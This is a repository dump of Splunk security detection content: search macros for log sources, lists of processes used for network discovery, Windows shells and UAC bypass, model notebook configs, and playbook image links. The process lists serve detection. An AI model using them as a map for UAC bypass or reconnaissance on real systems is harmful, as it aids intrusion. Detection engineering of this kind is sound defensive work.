--------------------------------------------------------------------------------
/macros/stream_dns.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=stream:dns
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: stream_dns
--------------------------------------------------------------------------------
/macros/stream_http.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=stream:http
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: stream_http
5 |
--------------------------------------------------------------------------------
/macros/stream_tcp.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=stream:tcp
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: stream_tcp
--------------------------------------------------------------------------------
/macros/subjectinterfacepackage.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="PwSh:SubjectInterfacePackage"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: subjectinterfacepackage
--------------------------------------------------------------------------------
/macros/summariesonly_config.yml:
--------------------------------------------------------------------------------
1 | definition: "false"
2 | description: Used inside security_content_summariesonly to adjust the summariesonly configuration
3 | name: summariesonly_config
4 |
--------------------------------------------------------------------------------
/macros/suricata.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=suricata
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: suricata
5 |
--------------------------------------------------------------------------------
/macros/suspicious_email_attachments.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true is_suspicious_file_extension_lookup file_name OUTPUT suspicious
2 | | search suspicious=true
3 | description: This macro limits the output to email attachments that have suspicious
4 | extensions
5 | name: suspicious_email_attachments
6 |
--------------------------------------------------------------------------------
/macros/suspicious_writes.yml:
--------------------------------------------------------------------------------
1 | definition: lookup suspicious_writes_lookup file as file_name OUTPUT note as "Reference"
2 | | search "Reference" != False
3 | description: This macro limites the output to file names that have been marked as
4 | suspicious
5 | name: suspicious_writes
6 |
--------------------------------------------------------------------------------
/macros/sysmon.yml:
--------------------------------------------------------------------------------
1 | definition: (source=WinEventLog:Microsoft-Windows-Sysmon/Operational OR source=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational OR source=Syslog:Linux-Sysmon/Operational)
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: sysmon
5 |
--------------------------------------------------------------------------------
/macros/system_network_configuration_discovery_tools.yml:
--------------------------------------------------------------------------------
1 | definition: (process_name="arp.exe" OR process_name="dsquery.exe" OR process_name="hostname.exe" OR process_name="ipconfig.exe" OR process_name="nbstat.exe" OR process_name="net.exe" OR process_name="netsh.exe" OR process_name="nslookup.exe" OR process_name= "ping.exe" OR process_name= "quser.exe" OR process_name="qwinsta.exe" OR process_name= "telnet.exe" OR process_name= "tracert.exe")
2 | description: This macro is a list of processes that can be used to discover the network configuration
3 | name: system_network_configuration_discovery_tools
4 |
--------------------------------------------------------------------------------
/macros/uacbypass_process_name.yml:
--------------------------------------------------------------------------------
1 | definition: 'BitlockerWizardElev.exe,cliconfg.exe,clipup.exe,cmstp.exe,CompMgmtLauncher.exe,consent.exe,control.exe,credwiz.exe,dccw.exe,dismhost.exe,EventVwr.exe,fodhelper.exe,GWXUXWorker.exe,inetmgr.exe,iscsicli.exe,mcx2prov.exe,migwiz.exe,mmc.exe,msconfig.exe,oobe.exe,osk.exe,pkgmgr.exe,recdisc.exe,rstrui.exe,sdclt.exe,setupsqm.exe,slui.exe,sysprep.exe,SystemPropertiesAdvanced.exe,taskhost.exe,TpmInit.exe,tzsync.exe,w32tm.exe,WerFault.exe,WSReset.exe,wusa.exe'
2 | description: A listing of processes known to be abused for User Account Control bypass exploitation.
3 | name: uacbypass_process_name
--------------------------------------------------------------------------------
/macros/windows_exchange_iis.yml:
--------------------------------------------------------------------------------
1 | definition: (sourcetype="MSWindows:2003:IIS" OR sourcetype="MSWindows:2008R2:IIS" OR sourcetype="MSWindows:2010EWS:IIS" OR sourcetype="MSWindows:2012:IIS" OR sourcetype="MSWindows:2013EWS:IIS")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: windows_exchange_iis
5 |
--------------------------------------------------------------------------------
/macros/windows_shells.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=cmd.exe OR Processes.process_name=powershell.exe OR Processes.process_name=pwsh.exe OR Processes.process_name=sh.exe OR Processes.process_name=bash.exe OR Processes.process_name=wscript.exe OR Processes.process_name=cscript.exe)
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: windows_shells
5 |
--------------------------------------------------------------------------------
/macros/wineventlog_application.yml:
--------------------------------------------------------------------------------
1 | definition: eventtype="wineventlog_application" OR Channel="application" OR source="XmlWinEventLog:Application" OR source="WinEventLog:Application"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: wineventlog_application
--------------------------------------------------------------------------------
/macros/wineventlog_rdp.yml:
--------------------------------------------------------------------------------
1 | definition: (source="WinEventLog:Microsoft-Windows-TerminalServices-RDPClient/Operational" OR source="XmlWinEventLog:Microsoft-Windows-TerminalServices-RDPClient/Operational")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk environment.
4 | name: wineventlog_rdp
5 |
--------------------------------------------------------------------------------
/macros/wineventlog_security.yml:
--------------------------------------------------------------------------------
1 | definition: eventtype="wineventlog_security" OR Channel="security" OR source="XmlWinEventLog:Security" OR source="WinEventLog:Security"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk environment.
4 | name: wineventlog_security
5 |
--------------------------------------------------------------------------------
/macros/wineventlog_system.yml:
--------------------------------------------------------------------------------
1 | definition: eventtype="wineventlog_system" OR Channel="system" OR source="XmlWinEventLog:System" OR source="WinEventLog:System"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk environment.
4 | name: wineventlog_system
5 |
--------------------------------------------------------------------------------
/macros/wineventlog_task_scheduler.yml:
--------------------------------------------------------------------------------
1 | definition: (source="XmlWinEventLog:Microsoft-Windows-TaskScheduler/Operational" OR source="WinEventLog:Microsoft-Windows-TaskScheduler/Operational")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk environment.
4 | name: wineventlog_task_scheduler
--------------------------------------------------------------------------------
/macros/wmi.yml:
--------------------------------------------------------------------------------
1 | definition: (source="WinEventLog:Microsoft-Windows-WMI-Activity/Operational" OR source="XmlWinEventLog:Microsoft-Windows-WMI-Activity/Operational")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: wmi
5 |
--------------------------------------------------------------------------------
/macros/zeek_rpc.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="zeek:rpc:json"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: zeek_rpc
5 |
--------------------------------------------------------------------------------
/macros/zeek_ssl.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="zeek:ssl:json"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: zeek_ssl
5 |
--------------------------------------------------------------------------------
/macros/zeek_x509.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="zeek:x509:json"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: zeek_x509
5 |
--------------------------------------------------------------------------------
/macros/zscaler_proxy.yml:
--------------------------------------------------------------------------------
1 | definition: source=zscaler sourcetype=zscalernss-web
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: zscaler_proxy
5 |
--------------------------------------------------------------------------------
/notebooks/cisa_commonalities_notebook.yml:
--------------------------------------------------------------------------------
1 | description: a simple jupyter notebook that helps Splunk Threat Research Team sees the data connections, commonalities and differences of security content stories or threat families.
2 | filename: cisa_commonalities_notebook.ipynb
3 | name: cisa_commonalities_notebook
--------------------------------------------------------------------------------
/notebooks/detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
1 | description: A Jupyter notebook for detecting DNS data exfiltration using a pre-trained model in DSDL
2 | filename: detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.ipynb
3 | name: detect_dns_data_exfiltration_using_pretrained_model_in_dsdl
--------------------------------------------------------------------------------
/notebooks/detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.json:
--------------------------------------------------------------------------------
1 | {"options": {"params": {"mode": "stage", "algo": "detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl"}, "args": ["is_unknown", "text"], "target_variable": ["is_unknown"], "feature_variables": ["text"], "model_name": "detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl", "algo_name": "MLTKContainer", "mlspl_limits": {"handle_new_cat": "default", "max_distinct_cat_values": "100", "max_distinct_cat_values_for_classifiers": "100", "max_distinct_cat_values_for_scoring": "100", "max_fit_time": "600", "max_inputs": "100000", "max_memory_usage_mb": "4000", "max_model_size_mb": "30", "max_score_time": "600", "use_sampling": "true"}, "kfold_cv": null}, "feature_variables": ["text"], "target_variables": ["is_unknown"]}
--------------------------------------------------------------------------------
/notebooks/detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
1 | description: A Jupyter notebook for detecting suspicious DNS TXT records using a pre-trained model in DSDL
2 | filename: detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.ipynb
3 | name: detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl
--------------------------------------------------------------------------------
/notebooks/detect_suspicious_processnames_using_pretrained_model_in_dsdl.json:
--------------------------------------------------------------------------------
1 | {"options": {"params": {"mode": "stage", "algo": "detect_suspicious_processnames_using_pretrained_model_in_dsdl"}, "args": ["label", "text"], "target_variable": ["label"], "feature_variables": ["text"], "model_name": "detect_suspicious_processnames_using_pretrained_model_in_dsdl", "algo_name": "MLTKContainer", "mlspl_limits": {"handle_new_cat": "default", "max_distinct_cat_values": "100", "max_distinct_cat_values_for_classifiers": "100", "max_distinct_cat_values_for_scoring": "100", "max_fit_time": "600", "max_inputs": "100000", "max_memory_usage_mb": "4000", "max_model_size_mb": "30", "max_score_time": "600", "use_sampling": "true"}, "kfold_cv": null}, "feature_variables": ["text"], "target_variables": ["label"]}
--------------------------------------------------------------------------------
/notebooks/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml:
--------------------------------------------------------------------------------
1 | description: A Jupyter notebook for detecting suspicious processnames using a pre-trained model in DSDL
2 | filename: detect_suspicious_processnames_using_pretrained_model_in_dsdl.ipynb
3 | name: detect_suspicious_processnames_using_pretrained_model_in_dsdl
--------------------------------------------------------------------------------
/notebooks/pretrained_dga_detection.yml:
--------------------------------------------------------------------------------
1 | description: A Jupyter notebook for detecting DGA domains using a pre-trained model in DSDL
2 | filename: pretrained_dga_model_dsdl.ipynb
3 | name: pretrained_dga_model_dsdl
--------------------------------------------------------------------------------
/notebooks/pretrained_dga_model_dsdl.json:
--------------------------------------------------------------------------------
1 | {"options": {"params": {"mode": "stage", "algo": "pretrained_dga_model_dsdl"}, "args": ["is_dga", "domain"], "target_variable": ["is_dga"], "feature_variables": ["domain"], "model_name": "pretrained_dga_model_dsdl", "algo_name": "MLTKContainer", "mlspl_limits": {"handle_new_cat": "default", "max_distinct_cat_values": "100", "max_distinct_cat_values_for_classifiers": "100", "max_distinct_cat_values_for_scoring": "100", "max_fit_time": "600", "max_inputs": "100000", "max_memory_usage_mb": "4000", "max_model_size_mb": "30", "max_score_time": "600", "use_sampling": "true"}, "kfold_cv": null}, "feature_variables": ["domain"], "target_variables": ["is_dga"]}
--------------------------------------------------------------------------------
/playbooks/AD_LDAP_Account_Locking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AD_LDAP_Account_Locking.png
--------------------------------------------------------------------------------
/playbooks/AD_LDAP_Account_Unlocking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AD_LDAP_Account_Unlocking.png
--------------------------------------------------------------------------------
/playbooks/AD_LDAP_Entity_Attribute_Lookup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AD_LDAP_Entity_Attribute_Lookup.png
--------------------------------------------------------------------------------
/playbooks/AWS_IAM_Account_Locking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AWS_IAM_Account_Locking.png
--------------------------------------------------------------------------------
/playbooks/AWS_IAM_Account_Unlocking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AWS_IAM_Account_Unlocking.png
--------------------------------------------------------------------------------
/playbooks/Active_Directory_Disable_Account_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Active_Directory_Disable_Account_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/Active_Directory_Enable_Account_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Active_Directory_Enable_Account_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/Attribute_Lookup_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Attribute_Lookup_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/Automated_Enrichment.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Automated_Enrichment.png
--------------------------------------------------------------------------------
/playbooks/Azure_AD_Account_Locking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Azure_AD_Account_Locking.png
--------------------------------------------------------------------------------
/playbooks/Azure_AD_Account_Unlocking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Azure_AD_Account_Unlocking.png
--------------------------------------------------------------------------------
/playbooks/Azure_AD_Graph_User_Attribute_Lookup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Azure_AD_Graph_User_Attribute_Lookup.png
--------------------------------------------------------------------------------
/playbooks/CiscoTalosIntelligence_Identifier_Reputation_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/CiscoTalosIntelligence_Identifier_Reputation_Analysis.png
--------------------------------------------------------------------------------
/playbooks/Cisco_Umbrella_DNS_Denylisting.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Cisco_Umbrella_DNS_Denylisting.png
--------------------------------------------------------------------------------
/playbooks/CrowdStrike_OAuth_API_Device_Attribute_Lookup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/CrowdStrike_OAuth_API_Device_Attribute_Lookup.png
--------------------------------------------------------------------------------
/playbooks/CrowdStrike_OAuth_API_Dynamic_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/CrowdStrike_OAuth_API_Dynamic_Analysis.png
--------------------------------------------------------------------------------
/playbooks/CrowdStrike_OAuth_API_Identifier_Activity_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/CrowdStrike_OAuth_API_Identifier_Activity_Analysis.png
--------------------------------------------------------------------------------
/playbooks/DNS_Denylisting_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/DNS_Denylisting_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/Dynamic_Analysis_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Dynamic_Analysis_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/G_Suite_for_GMail_Message_Identifier_Activity_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/G_Suite_for_GMail_Message_Identifier_Activity_Analysis.png
--------------------------------------------------------------------------------
/playbooks/G_Suite_for_Gmail_Message_Eviction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/G_Suite_for_Gmail_Message_Eviction.png
--------------------------------------------------------------------------------
/playbooks/G_Suite_for_Gmail_Search_and_Purge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/G_Suite_for_Gmail_Search_and_Purge.png
--------------------------------------------------------------------------------
/playbooks/Identifier_Activity_Analysis_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Identifier_Activity_Analysis_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/Identifier_Reputation_Analysis_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Identifier_Reputation_Analysis_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/Jira_Related_Tickets_Search.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Jira_Related_Tickets_Search.png
--------------------------------------------------------------------------------
/playbooks/MS_Graph_for_Office_365_Message_Eviction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Message_Eviction.png
--------------------------------------------------------------------------------
/playbooks/MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.png
--------------------------------------------------------------------------------
/playbooks/MS_Graph_for_Office_365_Message_Restore.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Message_Restore.png
--------------------------------------------------------------------------------
/playbooks/MS_Graph_for_Office_365_Search_and_Purge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Search_and_Purge.png
--------------------------------------------------------------------------------
/playbooks/MS_Graph_for_Office_365_Search_and_Restore.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Search_and_Restore.png
--------------------------------------------------------------------------------
/playbooks/Panorama_Outbound_Traffic_Filtering.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Panorama_Outbound_Traffic_Filtering.png
--------------------------------------------------------------------------------
/playbooks/PhishTank_URL_Reputation_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/PhishTank_URL_Reputation_Analysis.png
--------------------------------------------------------------------------------
/playbooks/Related_Tickets_Search_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Related_Tickets_Search_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/ServiceNow_Related_Tickets_Search.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/ServiceNow_Related_Tickets_Search.png
--------------------------------------------------------------------------------
/playbooks/Splunk_Attack_Analyzer_Dynamic_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Attack_Analyzer_Dynamic_Analysis.png
--------------------------------------------------------------------------------
/playbooks/Splunk_Automated_Email_Investigation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Automated_Email_Investigation.png
--------------------------------------------------------------------------------
/playbooks/Splunk_Identifier_Activity_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Identifier_Activity_Analysis.png
--------------------------------------------------------------------------------
/playbooks/Splunk_Message_Identifier_Activity_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Message_Identifier_Activity_Analysis.png
--------------------------------------------------------------------------------
/playbooks/Splunk_Notable_Related_Tickets_Search.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Notable_Related_Tickets_Search.png
--------------------------------------------------------------------------------
/playbooks/URL_Outbound_Traffic_Filtering_Dispatch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/URL_Outbound_Traffic_Filtering_Dispatch.png
--------------------------------------------------------------------------------
/playbooks/UrlScan_IO_Dynamic_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/UrlScan_IO_Dynamic_Analysis.png
--------------------------------------------------------------------------------
/playbooks/VirusTotal_v3_Dynamic_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/VirusTotal_v3_Dynamic_Analysis.png
--------------------------------------------------------------------------------
/playbooks/VirusTotal_v3_Identifier_Reputation_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/VirusTotal_v3_Identifier_Reputation_Analysis.png
--------------------------------------------------------------------------------
/playbooks/Windows_Defender_ATP_Identifier_Activity_Analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Windows_Defender_ATP_Identifier_Activity_Analysis.png
--------------------------------------------------------------------------------
/playbooks/Zscaler_Outbound_Traffic_Filtering.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Zscaler_Outbound_Traffic_Filtering.png
--------------------------------------------------------------------------------
/playbooks/activedirectory_reset_password.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/activedirectory_reset_password.png
--------------------------------------------------------------------------------
/playbooks/aws_disable_user_accounts.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/aws_disable_user_accounts.png
--------------------------------------------------------------------------------
/playbooks/aws_find_inactive_users.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/aws_find_inactive_users.png
--------------------------------------------------------------------------------
/playbooks/block_indicators.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/block_indicators.png
--------------------------------------------------------------------------------
/playbooks/crowdstrike_malware_triage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/crowdstrike_malware_triage.png
--------------------------------------------------------------------------------
/playbooks/custom_functions/noop.json:
--------------------------------------------------------------------------------
1 | {
2 | "create_time": "2021-04-28T19:53:21.159704+00:00",
3 | "custom_function_id": "561cadef222a920bb91c236c6e9eb7604f537369",
4 | "description": "Do nothing and return nothing. Use this if you want to do something in a custom function setup section or leave a placeholder block in a playbook. This does not sleep or wait and will return as soon as possible.",
5 | "draft_mode": false,
6 | "inputs": [],
7 | "outputs": [],
8 | "platform_version": "4.10.3.51237",
9 | "python_version": "3"
10 | }
--------------------------------------------------------------------------------
/playbooks/custom_functions/noop.py:
--------------------------------------------------------------------------------
1 | def noop(**kwargs):
2 | """
3 | Do nothing and return nothing. Use this if you want to do something in a custom function setup section or leave a placeholder block in a playbook. This does not sleep or wait and will return as soon as possible.
4 |
5 | Returns a JSON-serializable object that implements the configured data paths:
6 |
7 | """
8 | ############################ Custom Code Goes Below This Line #################################
9 | import json
10 | import phantom.rules as phantom
11 |
12 | outputs = {}
13 |
14 | # Return a JSON-serializable object
15 | assert json.dumps(outputs) # Will raise an exception if the :outputs: object is not JSON-serializable
16 | return outputs
17 |
--------------------------------------------------------------------------------
/playbooks/delete_detected_files.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/delete_detected_files.png
--------------------------------------------------------------------------------
/playbooks/email_notification_for_malware.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/email_notification_for_malware.png
--------------------------------------------------------------------------------
/playbooks/hunting.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/hunting.png
--------------------------------------------------------------------------------
/playbooks/internal_host_splunk_investigate_log4j.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_splunk_investigate_log4j.png
--------------------------------------------------------------------------------
/playbooks/internal_host_ssh_investigate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_ssh_investigate.png
--------------------------------------------------------------------------------
/playbooks/internal_host_ssh_log4j_investigate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_ssh_log4j_investigate.png
--------------------------------------------------------------------------------
/playbooks/internal_host_ssh_log4j_respond.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_ssh_log4j_respond.png
--------------------------------------------------------------------------------
/playbooks/internal_host_winrm_investigate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_winrm_investigate.png
--------------------------------------------------------------------------------
/playbooks/internal_host_winrm_log4j_investigate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_winrm_log4j_investigate.png
--------------------------------------------------------------------------------
/playbooks/internal_host_winrm_log4j_respond.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_winrm_log4j_respond.png
--------------------------------------------------------------------------------
/playbooks/log4j_investigate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/log4j_investigate.png
--------------------------------------------------------------------------------
/playbooks/log4j_respond.png:
--------------------------------------------------------------------------------
